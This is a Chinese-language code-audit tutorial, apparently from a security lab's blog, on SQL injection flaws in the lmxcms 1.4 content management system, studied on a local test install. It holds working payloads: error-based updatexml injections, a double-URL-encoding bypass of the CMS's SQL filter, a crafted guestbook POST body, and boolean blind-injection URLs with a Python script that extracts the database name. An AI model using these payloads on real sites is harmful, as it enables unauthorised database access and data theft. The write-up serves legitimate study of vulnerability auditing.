lmxcms代码审计学习

精选原创

合天网安实验室 2023-03-30 10:01:18 ©著作权

文章标签 php 代码审计 lmxcms 文章分类 网络安全 yyds干货盘点

©著作权归作者所有：来自51CTO博客作者合天网安实验室的原创作品，请联系作者获取转载授权，否则将追究法律责任

前言

最近学习php代码审计，lmxcms很适合去学习代码审计，因为比较简单。

环境搭建

phpstudy+phpstorm,apache2.4.39+MySQL5.7.26,php5.3.29

lmxcms代码审计学习_代码审计

lmxcms代码审计学习_lmxcms_02

lmxcms代码审计学习_代码审计_03

网站首页

lmxcms代码审计学习_lmxcms_04

后台管理

lmxcms代码审计学习_php_05

搭建成功

框架配置

入口文件

lmxcms代码审计学习_lmxcms_06

config.inc.php配置文件

run.inc.php 初始化文件

入口

lmxcms代码审计学习_代码审计_07

在Action.class.php中找到调用方法的

lmxcms代码审计学习_代码审计_08

可以看出m参数是类名前缀，开头大写，a参数是方法名

那么我就知道该框架处理请求的格式如下

http://127.0.0.1/lmxcms1.4/admin.php?m=xx类名&a=xx方法

帮助网安学习，全套资料S信免费领取：

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC分析报告

④ 150+网安实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集（含答案）

⑧ APP客户端安全检测指南（安卓+IOS）

后台SQL注入

在bookaction.class.php

lmxcms代码审计学习_lmxcms_09

在这里可以看到这个id是可控的，于是进入getReply函数里看看

lmxcms代码审计学习_lmxcms_10

lmxcms代码审计学习_lmxcms_11

发现这里执行了SQL语句

在后面写个echo$sql方便看

lmxcms代码审计学习_代码审计_12

因为正常输入没回显，采取报错注入

admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)--+

lmxcms代码审计学习_lmxcms_13

前台SQL注入

TagsAction.class.php中

lmxcms代码审计学习_lmxcms_14

看不出来$data['name']的值是如何来的，查看的p的方法

lmxcms代码审计学习_php_15

可以看到type=2的时候为GET传递，说明我们可以控制这个参数，继续看能不能利用

查看getNameData的声明

lmxcms代码审计学习_php_16

查看oneModel

lmxcms代码审计学习_php_17

查看oneDB

lmxcms代码审计学习_代码审计_18

lmxcms代码审计学习_php_19

接着在这上面写个echo $sql；

/index.php/?m=Tags&name=1

会跳404，但echo 出来了sql语句，说明这个过程是有sql语句执行的

lmxcms代码审计学习_lmxcms_20

这个时候继续利用报错函数执行试试

' and updatexml(0,concat(0x7e,user()),1) --+

lmxcms代码审计学习_lmxcms_21

发现是空白，连报错都没有，其实仔细看之前common.php里，有filter_sql方法

lmxcms代码审计学习_php_22

但是这里写了一个url解码的函数，且这个语句执行是在sql语句过滤执行的后面，那么我尝试二次编码注入

lmxcms代码审计学习_lmxcms_23

lmxcms代码审计学习_代码审计_24

执行成功，但在1.41版本的修复了这个漏洞

这里用代码对比下可以明显看出来

lmxcms代码审计学习_代码审计_25

前台留言SQL注入

在前台留言这里

lmxcms代码审计学习_代码审计_26

随便提交一个，提交成功并没有显示，进后台看看

lmxcms代码审计学习_php_27

需要审核才能显示

审查源码

在BookAction.class.php中，发现POST传setbook后会进入checkdata函数

lmxcms代码审计学习_php_28

lmxcms代码审计学习_php_29

里面是验证前台数据并且过滤了html代码并且有filter_sql

lmxcms代码审计学习_lmxcms_30

过滤了sql语句常用函数，在这里就不能用二次编码绕过了，因为这里没写url解码函数

lmxcms代码审计学习_lmxcms_31

查看addmodel

lmxcms代码审计学习_lmxcms_32

查看addDB

lmxcms代码审计学习_lmxcms_33

即使我们有二次注入的思路，但这个需要管理员审核才能看到回显

随便测试一个看看

lmxcms代码审计学习_lmxcms_34

在数据库中显示为

lmxcms代码审计学习_php_35

可以看出这个ischeck是判断是否显示在前台的，那么我们进行注入，把ischeck修改为1就可以回显在前端了

lmxcms代码审计学习_代码审计_36

POST提交

setbook=1&name=1&cnotallow=1&time,ischeck)VALUES((select/**/version()),'1','','','127.0.0.1','1679301152','1')#=1

前台布尔盲注

searchaction.class.php

lmxcms代码审计学习_php_37

serchmodel

lmxcms代码审计学习_代码审计_38

countModel

lmxcms代码审计学习_代码审计_39

countDB

lmxcms代码审计学习_php_40

在这里写入echo $sql;方便尝试注入

lmxcms代码审计学习_代码审计_41

利用这些参数进行注入

lmxcms代码审计学习_代码审计_42

可以利用tuijian这个参数注入，或者也可以用renmen看构造问题

lmxcms代码审计学习_php_43

SELECT count(1) FROM lmx_product_data WHERE time > 1647768137 ANDremen=1 AND (title like '%a%') ORDER BY id desc

执行如上sql语句，这里同样也进行了filter_sql函数过滤，且没有url编码不能向第一个那样二次编码绕过，具体可在p方法里找

index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+

GET/lmxcms1.4/index.php?m=search&keywords=b&mid=1&tuijian=id%20or%20(if(ascii(substr(database(),1,1))=0x6,1,0));%23

这里0x6c对应的是l

lmxcms代码审计学习_lmxcms_44

回显长度为8425,随便改个参数，返回包长度变为5403

lmxcms代码审计学习_代码审计_45

用remen参数回显为8422

lmxcms代码审计学习_代码审计_46

写一个简单的python脚本就可以测出值

lmxcms代码审计学习_代码审计_47

import requests\flag=""\url="http://127.0.0.1/lmxcms1.4/index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),{},1))={},1,0))%23"\for i in range(1,7):\for j in range(65,122):\res=requests.get(url.format(i,hex(j)))\if len(res.text)>7000:\flag=flag+chr(j)\print(flag)\else:\print(url)\print(flag)